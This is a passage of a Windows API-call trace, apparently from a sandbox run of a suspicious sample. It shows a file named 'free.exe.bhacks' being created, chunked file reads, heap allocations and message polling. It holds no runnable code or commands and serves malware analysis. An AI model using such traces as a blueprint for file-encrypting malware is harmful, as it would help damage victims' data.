free.exe.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0088.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.407] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0088.407] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0088.408] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0088.409] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0088.411] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0088.412] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0088.413] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0088.414] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0088.415] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0088.416] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0088.418] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0088.419] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0088.420] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0088.421] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0088.422] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0088.424] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0088.425] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0xb30, lpOverlapped=0x0) returned 1 [0088.425] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0088.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0088.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0088.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0088.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x39ca020 | out: hHeap=0x2af0000) returned 1 [0088.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0088.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0088.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0088.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0088.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0088.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0088.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0088.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3ad5020 | out: hHeap=0x2af0000) returned 1 [0088.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0088.471] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0088.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3ac6020 | out: hHeap=0x2af0000) returned 1 [0088.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0088.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0088.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0088.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0088.487] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0088.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0088.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0088.487] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.487] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0088.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0088.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0088.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0088.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b58 [0088.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0088.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0088.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0088.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0088.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf0b30) returned 0x3ac6020 [0088.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0088.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73118 [0088.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0088.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0088.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0088.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71718 [0088.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0088.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71688 [0088.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0088.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0088.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0088.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0088.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0088.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0088.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0088.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0088.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0088.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf0b30) returned 0x3bc7020 [0088.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0088.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0088.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0088.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0088.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0088.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0088.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0088.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0088.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0088.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0088.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0088.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0088.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0088.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0088.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0088.519] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0088.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0088.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0088.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0088.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0088.519] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0088.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0088.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0088.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0088.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0088.519] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0088.519] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0088.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0088.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0088.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0088.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0088.520] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0088.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0088.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0088.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0088.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.521] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0088.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0088.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0088.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0088.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.521] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0088.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0088.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0088.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0088.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0088.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0088.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0088.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.522] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0088.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0088.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0088.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0088.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0088.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0088.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0088.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0088.522] HeapFree (in: 